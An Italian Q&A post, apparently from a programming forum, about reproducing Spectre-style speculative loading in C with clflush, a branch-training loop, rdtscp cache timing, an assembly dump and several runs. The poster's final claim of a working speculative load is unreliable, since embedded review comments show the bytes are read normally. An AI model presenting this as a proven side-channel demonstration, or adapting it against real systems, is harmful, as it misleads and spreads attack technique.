Sto cercando di caricare "a" (la a minuscola) in modo speculativo usando Spectre.
È stato suggerito qui:
Spectre Spectre - Basati su carta - risultati opposti
che il motivo per cui il caricamento speculativo non avviene potrebbe essere:
- ramo non addestrato
- ottimizzazione del compilatore
Ecco il codice:
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <time.h> /* for time(), used to seed rand() */
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
/*
 * Cache-timing experiment.
 *
 * 1. Fills array1 with 'A'..'Z' repeated, with 'a' as the final element.
 * 2. Writes to every byte of array2 and flushes one cache line per 512-byte
 *    probe slot.
 * 3. Stores array1[i] into the probe slot selected by its value for every
 *    index except SKIPPED_INDEX, so the slot for 'a' is never touched by an
 *    architecturally executed statement.
 * 4. Times one load from each candidate slot, in random order, and prints
 *    the cycle count reported by rdtscp.
 *
 * The slot for '1' is never written after the flush and serves as the
 * "not cached" reference.
 *
 * NOTE(review): the guard `i != SKIPPED_INDEX` depends only on the loop
 * counter; whether the processor ever executes the guarded store
 * speculatively for index 103 is hardware-dependent and is not established
 * by this code.
 *
 * Returns 0.
 */
int main(void)
{
    enum {
        ARRAY1_LEN = 104,    /* four runs of 'A'..'Z'; the last byte becomes 'a' */
        SKIPPED_INDEX = 103, /* position of 'a', excluded by the guard below */
        PROBE_STRIDE = 512,  /* bytes between two probe slots in array2 */
        PROBE_SLOTS = 256    /* one slot per possible byte value */
    };
    /* Values whose probe slots are timed: 'A'..'Z', 'a', and the control '1'. */
    static const char candidates[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZa1";
    enum { CANDIDATE_COUNT = sizeof candidates - 1 };

    volatile uint8_t array1[ARRAY1_LEN];
    for (int i = 0; i < ARRAY1_LEN; i++)
        array1[i] = (uint8_t)('A' + i % 26);
    array1[SKIPPED_INDEX] = 'a';

    uint8_t array2[PROBE_SLOTS * PROBE_STRIDE];
    /* write to array2 so in RAM not copy-on-write zero pages */
    memset(array2, 1, sizeof array2);
    for (int slot = 0; slot < PROBE_SLOTS; slot++)
        _mm_clflush(&array2[slot * PROBE_STRIDE]); /* intrinsic for clflush instruction */

    printf("%c is speculatively executed\n", array1[SKIPPED_INDEX]);

    for (int i = 0; i < ARRAY1_LEN; i++) {
        if (i != SKIPPED_INDEX) {
            array2[array1[i] * PROBE_STRIDE] = array1[i];
        }
    }

    /*
     * Probe the candidates in random order (Fisher-Yates shuffle). Unsigned
     * bytes are used so no in-band sentinel that depends on the signedness
     * of plain char is needed.
     */
    uint8_t probe_order[CANDIDATE_COUNT];
    memcpy(probe_order, candidates, CANDIDATE_COUNT);
    srand((unsigned int)time(NULL));
    for (int last = CANDIDATE_COUNT - 1; last > 0; last--) {
        int pick = rand() % (last + 1);
        uint8_t swapped = probe_order[last];
        probe_order[last] = probe_order[pick];
        probe_order[pick] = swapped;
    }

    for (int k = 0; k < CANDIDATE_COUNT; k++) {
        int value = probe_order[k];
        volatile uint8_t *addr = &array2[value * PROBE_STRIDE];
        unsigned int tsc_aux = 0; /* receives the auxiliary value written by rdtscp */

        /* Keep the counter in 64 bits until after the subtraction. */
        uint64_t start = __rdtscp(&tsc_aux);
        uint8_t loaded = *addr; /* the timed load; volatile forces the access */
        uint64_t elapsed = __rdtscp(&tsc_aux) - start;
        (void)loaded;

        if (value == '1') {
            printf("%c is not cached\n", value);
        }
        printf("trying: %c time: %i\n", value, (int)elapsed);
    }
    return 0;
}
Spero che l'ottimizzazione del compilatore non sia il problema.
2 domande:
- Come posso verificare se il compilatore lo ha ottimizzato?
- Come posso addestrare il ramo?
Qualcuno può spiegare il secondo punto su questo esempio, o su uno più semplice (con un esempio di codice o l'output di gdb)?
Grazie,
Aggiornamento 1:
Ho compilato solo il frammento rilevante (il ciclo for).
user@laptop:~/labspectre$ cat test.c
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
/*
 * Reduced listing: only the array setup and the guarded copy loop.
 * Nothing is printed and array2 is never read.
 */
void main(void)
{
/* 104 bytes: 'A'..'Z' (65..90) repeated; the final element, array1[103], is 'a' (97). */
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };
/* 256 slots of 512 bytes, one per possible byte value; not initialised here. */
uint8_t array2[256 * 512];
/* Assigned but never read. */
int dummy = 0;
for(int i=0; i<104; i++) {
/* Index 103 (the 'a') is the only element the loop body skips. */
if (i != 103) {
/* Store the byte into the slot selected by its own value (value * 512). */
/* array1 is volatile, so it is read twice per iteration. */
array2[array1[i] * 512] = array1[i];
}
}
}
Ecco il dump asm:
user@laptop:~/labspectre$ cat test.s
# Compiler-generated listing for test.c (GCC 5.4.0 according to the .ident
# line below). Comments were added by hand; instruction lines are unchanged.
.file "test.c"
.text
.globl main
.type main, @function
main:
.LFB2:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
# Reserve 131328 bytes of stack for the locals.
subq $131328, %rsp
# Save the value at %fs:40 in -8(%rbp); it is compared again before
# returning, with __stack_chk_fail called on mismatch.
movq %fs:40, %rax
movq %rax, -8(%rbp)
xorl %eax, %eax
# The 104 initializer bytes are first stored one at a time into a temporary
# area at -131200(%rbp) .. -131097(%rbp).
movb $65, -131200(%rbp)
movb $66, -131199(%rbp)
movb $67, -131198(%rbp)
movb $68, -131197(%rbp)
movb $69, -131196(%rbp)
movb $70, -131195(%rbp)
movb $71, -131194(%rbp)
movb $72, -131193(%rbp)
movb $73, -131192(%rbp)
movb $74, -131191(%rbp)
movb $75, -131190(%rbp)
movb $76, -131189(%rbp)
movb $77, -131188(%rbp)
movb $78, -131187(%rbp)
movb $79, -131186(%rbp)
movb $80, -131185(%rbp)
movb $81, -131184(%rbp)
movb $82, -131183(%rbp)
movb $83, -131182(%rbp)
movb $84, -131181(%rbp)
movb $85, -131180(%rbp)
movb $86, -131179(%rbp)
movb $87, -131178(%rbp)
movb $88, -131177(%rbp)
movb $89, -131176(%rbp)
movb $90, -131175(%rbp)
movb $65, -131174(%rbp)
movb $66, -131173(%rbp)
movb $67, -131172(%rbp)
movb $68, -131171(%rbp)
movb $69, -131170(%rbp)
movb $70, -131169(%rbp)
movb $71, -131168(%rbp)
movb $72, -131167(%rbp)
movb $73, -131166(%rbp)
movb $74, -131165(%rbp)
movb $75, -131164(%rbp)
movb $76, -131163(%rbp)
movb $77, -131162(%rbp)
movb $78, -131161(%rbp)
movb $79, -131160(%rbp)
movb $80, -131159(%rbp)
movb $81, -131158(%rbp)
movb $82, -131157(%rbp)
movb $83, -131156(%rbp)
movb $84, -131155(%rbp)
movb $85, -131154(%rbp)
movb $86, -131153(%rbp)
movb $87, -131152(%rbp)
movb $88, -131151(%rbp)
movb $89, -131150(%rbp)
movb $90, -131149(%rbp)
movb $65, -131148(%rbp)
movb $66, -131147(%rbp)
movb $67, -131146(%rbp)
movb $68, -131145(%rbp)
movb $69, -131144(%rbp)
movb $70, -131143(%rbp)
movb $71, -131142(%rbp)
movb $72, -131141(%rbp)
movb $73, -131140(%rbp)
movb $74, -131139(%rbp)
movb $75, -131138(%rbp)
movb $76, -131137(%rbp)
movb $77, -131136(%rbp)
movb $78, -131135(%rbp)
movb $79, -131134(%rbp)
movb $80, -131133(%rbp)
movb $81, -131132(%rbp)
movb $82, -131131(%rbp)
movb $83, -131130(%rbp)
movb $84, -131129(%rbp)
movb $85, -131128(%rbp)
movb $86, -131127(%rbp)
movb $87, -131126(%rbp)
movb $88, -131125(%rbp)
movb $89, -131124(%rbp)
movb $90, -131123(%rbp)
movb $65, -131122(%rbp)
movb $66, -131121(%rbp)
movb $67, -131120(%rbp)
movb $68, -131119(%rbp)
movb $69, -131118(%rbp)
movb $70, -131117(%rbp)
movb $71, -131116(%rbp)
movb $72, -131115(%rbp)
movb $73, -131114(%rbp)
movb $74, -131113(%rbp)
movb $75, -131112(%rbp)
movb $76, -131111(%rbp)
movb $77, -131110(%rbp)
movb $78, -131109(%rbp)
movb $79, -131108(%rbp)
movb $80, -131107(%rbp)
movb $81, -131106(%rbp)
movb $82, -131105(%rbp)
movb $83, -131104(%rbp)
movb $84, -131103(%rbp)
movb $85, -131102(%rbp)
movb $86, -131101(%rbp)
movb $87, -131100(%rbp)
movb $88, -131099(%rbp)
movb $89, -131098(%rbp)
movb $97, -131097(%rbp)
# Copy the temporary area, 8 bytes at a time (13 x 8 = 104 bytes), to
# -131312(%rbp); the loop below indexes that address, so it is array1.
movq -131200(%rbp), %rax
movq %rax, -131312(%rbp)
movq -131192(%rbp), %rax
movq %rax, -131304(%rbp)
movq -131184(%rbp), %rax
movq %rax, -131296(%rbp)
movq -131176(%rbp), %rax
movq %rax, -131288(%rbp)
movq -131168(%rbp), %rax
movq %rax, -131280(%rbp)
movq -131160(%rbp), %rax
movq %rax, -131272(%rbp)
movq -131152(%rbp), %rax
movq %rax, -131264(%rbp)
movq -131144(%rbp), %rax
movq %rax, -131256(%rbp)
movq -131136(%rbp), %rax
movq %rax, -131248(%rbp)
movq -131128(%rbp), %rax
movq %rax, -131240(%rbp)
movq -131120(%rbp), %rax
movq %rax, -131232(%rbp)
movq -131112(%rbp), %rax
movq %rax, -131224(%rbp)
movq -131104(%rbp), %rax
movq %rax, -131216(%rbp)
# Zero a 4-byte local that is not referenced again (presumably `dummy`).
movl $0, -131316(%rbp)
# Loop counter i = 0, kept in memory at -131320(%rbp).
movl $0, -131320(%rbp)
jmp .L2
.L4:
# The `i != 103` test is present: when i == 103 the store is skipped.
cmpl $103, -131320(%rbp)
je .L3
# First read of array1[i]; shifted left by 9, i.e. multiplied by 512.
movl -131320(%rbp), %eax
cltq
movzbl -131312(%rbp,%rax), %eax
movzbl %al, %eax
sall $9, %eax
movl %eax, %ecx
# Second read of array1[i]: the value to be stored.
movl -131320(%rbp), %eax
cltq
movzbl -131312(%rbp,%rax), %edx
movslq %ecx, %rax
# Byte store into array2, whose base is -131088(%rbp).
movb %dl, -131088(%rbp,%rax)
.L3:
# i++
addl $1, -131320(%rbp)
.L2:
# Loop condition: continue while i <= 103 (i < 104).
cmpl $103, -131320(%rbp)
jle .L4
nop
# Compare the saved value with %fs:40 before returning.
movq -8(%rbp), %rax
xorq %fs:40, %rax
je .L5
call __stack_chk_fail
.L5:
leave
.cfi_def_cfa 7, 8
ret
.cfi_endproc
.LFE2:
.size main, .-main
.ident "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.5) 5.4.0 20160609"
.section .note.GNU-stack,"",@progbits
user@laptop:~/labspectre$
A me sembra corretto. Vedo l'inizializzazione dell'array e le istruzioni:
cmpl $103, -131320(%rbp)
je .L3
che confrontano l'indice con 103 all'interno del ciclo.
Quindi il controllo NON è stato eliminato dall'ottimizzazione, giusto?
Aggiornamento 3:
OK questa volta penso che funzioni. Carico "a" e "b" speculativamente. Come puoi vedere, non sono caricati nel codice.
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <time.h> /* for time(), used to seed rand() */
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
/*
 * Cache-timing experiment with a training loop.
 *
 * 1. Fills array1 with 'A'..'Z' repeated, ending in 'a' (index 103) and
 *    'b' (index 104).
 * 2. Writes to every byte of array2 and flushes one cache line per 512-byte
 *    probe slot.
 * 3. Runs 999 x 30 passes; in each pass x is either a small training value
 *    or a random "malicious" value, and when x < GUARD_LIMIT the whole of
 *    array1 is copied into the probe slots selected by its bytes.
 * 4. Times one load from each candidate slot, in random order, and prints
 *    the cycle count reported by rdtscp.
 *
 * NOTE(review): the guard tests x, but the copy loop indexes array1 with i.
 * Whenever x is a training value (always below 16), the loop body runs for
 * every i from 0 to 104, so array1[103] and array1[104] are read by
 * ordinary, non-speculative execution. A short probe time for 'a' and 'b'
 * therefore does not show that they were loaded speculatively.
 *
 * NOTE(review): array1_size is flushed before each pass, but the guard
 * compares x with a constant and never reads array1_size.
 *
 * Returns 0.
 */
int main(void)
{
    enum {
        ARRAY1_LEN = 105,   /* four runs of 'A'..'Z', last two bytes replaced */
        GUARD_LIMIT = 103,  /* bound used by the guard in the copy loop */
        PROBE_STRIDE = 512, /* bytes between two probe slots in array2 */
        PROBE_SLOTS = 256   /* one slot per possible byte value */
    };
    /* Values whose probe slots are timed: 'A'..'Z', 'a', the control '1', 'b'. */
    static const char candidates[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZa1b";
    enum { CANDIDATE_COUNT = sizeof candidates - 1 };

    /* array of chars A-Z and "a" and "b" at the end */
    volatile uint8_t array1[ARRAY1_LEN];
    for (int i = 0; i < ARRAY1_LEN; i++)
        array1[i] = (uint8_t)('A' + i % 26);
    array1[103] = 'a';
    array1[104] = 'b';

    uint8_t array2[PROBE_SLOTS * PROBE_STRIDE];
    /* write to array2 so in RAM not copy-on-write zero pages */
    memset(array2, 1, sizeof array2);
    for (int slot = 0; slot < PROBE_SLOTS; slot++)
        _mm_clflush(&array2[slot * PROBE_STRIDE]); /* intrinsic for clflush instruction */

    printf("%c and %c are speculatively executed/loaded\n", array1[103], array1[104]);

    srand((unsigned int)time(NULL));
    unsigned int array1_size = 16;
    size_t malicious_x = (size_t)rand();

    for (int tries = 999; tries > 0; tries--) {
        size_t training_x = tries % array1_size;
        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        for (int j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            size_t x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16));                /* Set x=-1 if j%6==0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* The guard is re-evaluated for every i, but only x is tested. */
            for (int i = 0; i < ARRAY1_LEN; i++) {
                if (x < GUARD_LIMIT) {
                    array2[array1[i] * PROBE_STRIDE] = array1[i];
                }
            }
        }
    }

    /*
     * Probe the candidates in random order (Fisher-Yates shuffle). Unsigned
     * bytes are used so no in-band sentinel that depends on the signedness
     * of plain char is needed.
     */
    uint8_t probe_order[CANDIDATE_COUNT];
    memcpy(probe_order, candidates, CANDIDATE_COUNT);
    for (int last = CANDIDATE_COUNT - 1; last > 0; last--) {
        int pick = rand() % (last + 1);
        uint8_t swapped = probe_order[last];
        probe_order[last] = probe_order[pick];
        probe_order[pick] = swapped;
    }

    for (int k = 0; k < CANDIDATE_COUNT; k++) {
        int value = probe_order[k];
        volatile uint8_t *addr = &array2[value * PROBE_STRIDE];
        unsigned int tsc_aux = 0; /* receives the auxiliary value written by rdtscp */

        /* Keep the counter in 64 bits until after the subtraction. */
        uint64_t start = __rdtscp(&tsc_aux);
        uint8_t loaded = *addr; /* the timed load; volatile forces the access */
        uint64_t elapsed = __rdtscp(&tsc_aux) - start;
        (void)loaded;

        if (value == '1') {
            printf("%c is not cached\n", value);
        }
        printf("trying: %c time: %i\n", value, (int)elapsed);
    }
    return 0;
}
Esecuzione:
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: P time: 96
trying: Y time: 92
trying: N time: 93
trying: A time: 118
trying: J time: 109
trying: O time: 92
trying: Z time: 92
1 is not cached
trying: 1 time: 316
trying: T time: 92
trying: X time: 93
trying: C time: 93
trying: R time: 92
trying: U time: 92
trying: G time: 92
trying: B time: 93
trying: E time: 93
trying: D time: 94
trying: M time: 93
trying: H time: 92
trying: Q time: 92
trying: V time: 93
trying: a time: 92
trying: b time: 134
trying: I time: 92
trying: L time: 93
trying: S time: 93
trying: W time: 92
trying: F time: 92
trying: K time: 270
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Y time: 96
trying: J time: 219
trying: S time: 121
trying: R time: 92
trying: O time: 93
trying: A time: 113
trying: M time: 95
trying: Q time: 95
trying: U time: 123
trying: I time: 93
trying: N time: 93
trying: Z time: 92
trying: E time: 93
trying: H time: 92
trying: W time: 93
trying: K time: 92
1 is not cached
trying: 1 time: 305
trying: b time: 93
trying: D time: 93
trying: C time: 93
trying: L time: 95
trying: T time: 92
trying: X time: 93
trying: B time: 93
trying: a time: 92
trying: G time: 93
trying: V time: 93
trying: P time: 93
trying: F time: 95
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: W time: 96
trying: L time: 328
trying: I time: 93
1 is not cached
trying: 1 time: 305
trying: T time: 101
trying: G time: 93
trying: b time: 101
trying: E time: 93
trying: H time: 93
trying: F time: 93
trying: O time: 93
trying: C time: 122
trying: Q time: 94
trying: V time: 94
trying: a time: 93
trying: B time: 93
trying: A time: 96
trying: P time: 92
trying: Y time: 97
trying: Z time: 92
trying: S time: 93
trying: N time: 92
trying: U time: 92
trying: K time: 101
trying: J time: 93
trying: X time: 93
trying: M time: 93
trying: R time: 93
trying: D time: 107
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Q time: 941
trying: M time: 109
trying: A time: 101
trying: W time: 122
trying: N time: 93
trying: R time: 133
trying: H time: 94
trying: G time: 93
trying: Z time: 92
trying: B time: 94
trying: O time: 92
trying: C time: 98
trying: Y time: 93
trying: D time: 93
trying: F time: 92
trying: U time: 93
trying: P time: 95
trying: V time: 93
trying: S time: 93
trying: b time: 101
trying: T time: 92
trying: X time: 94
trying: I time: 93
trying: L time: 93
trying: E time: 92
trying: K time: 92
1 is not cached
trying: 1 time: 288
trying: a time: 92
trying: J time: 93
Gli accessi ai valori presenti in cache richiedono circa 90 cicli; quelli ai valori non presenti in cache circa 300 cicli.